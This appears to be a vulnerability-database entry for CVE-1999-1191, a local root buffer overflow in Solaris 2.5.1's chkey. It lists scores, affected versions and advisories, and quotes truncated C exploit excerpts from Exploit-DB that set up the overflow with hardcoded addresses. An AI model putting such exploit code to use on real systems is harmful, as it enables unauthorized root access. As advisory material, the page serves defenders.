CVE-1999-1191
Published 1997-05-19
CVE-1999-1191: Buffer overflow in chkey in Solaris 2.5.1 and earlier allows local users to gain root privileges via a long command line argument.
Priority P428 · high · 7.2 (CVSS 2.0)
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.94% (77.6th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | <= 5.5.1 | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
No detection rules found.
Exploit-DB
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
exploitdb·1997-05-19
---
cat > ps_expl.po ps_expl.c
```c
#include
#include
#include
#define BUF_LENGTH (632)
#define EXTRA (256)
int main(int argc, char *argv[])
{
    char buf[BUF_LENGTH + EXTRA];
    /* ps will grok this file for the exploit code */
    char *envp[]={"NLSPATH=/tmp/foo",0};
    u_long *long_p;
    u_char *char_p;
    /* This will vary depending on your libc */
    u_long *proc_link=0xef771408;
    int i;
    long_p = (u_long *) buf;
    /* This first loop smashes the target buffer for optargs */
    for (i = 0; i < (96) / sizeof(u_long); i++)
        *long_p++ = 0x10101010;
    /* At offset 96 is the environ ptr -- be careful not to mess it up */
    *long_p++=0xeffffcb0;
    *long_p++=0xffffffff;
    /* After that is the _ctype table. Filling with 0x10101010 marks the
    entire character set as being "uppercase pr
```
Exploit-DB
Solaris 2.5.1 - 'chkey' Local Privilege Escalation
exploitdb·1997-05-19
---
```c
/*
source: https://www.securityfocus.com/bid/207/info
The chkey program is used to change a user's secure RPC Diffie-Hellman public key and secret key pair. A buffer overflow condition has been found in the chkey program. Since chkey has setuid root permissions, an unauthorized user may be able to gain root access.
*/
/*
 * stdioflow -- exploit for data overrun conditions
 * [email protected] (Adam Morrison)
 *
 * This program causes programs which use stdio(3S) and have data buffer
 * overflow conditions to overwrite stdio's iob[] array of FILE structures
 * with malicious, buffered FILEs. Thus it is possible to get stdio to
 * overwrite arbitrary places in memory; specifically, it overwrites a
 * specific procedure linkage table entry w
```
No writeups or analysis indexed.
ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.18.solaris.chkey.buffer.overflow.vul
http://marc.info/?l=bugtraq&m=87602167418335&w=2
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/144
http://www.iss.net/security_center/static/7442.php
http://www.securityfocus.com/bid/207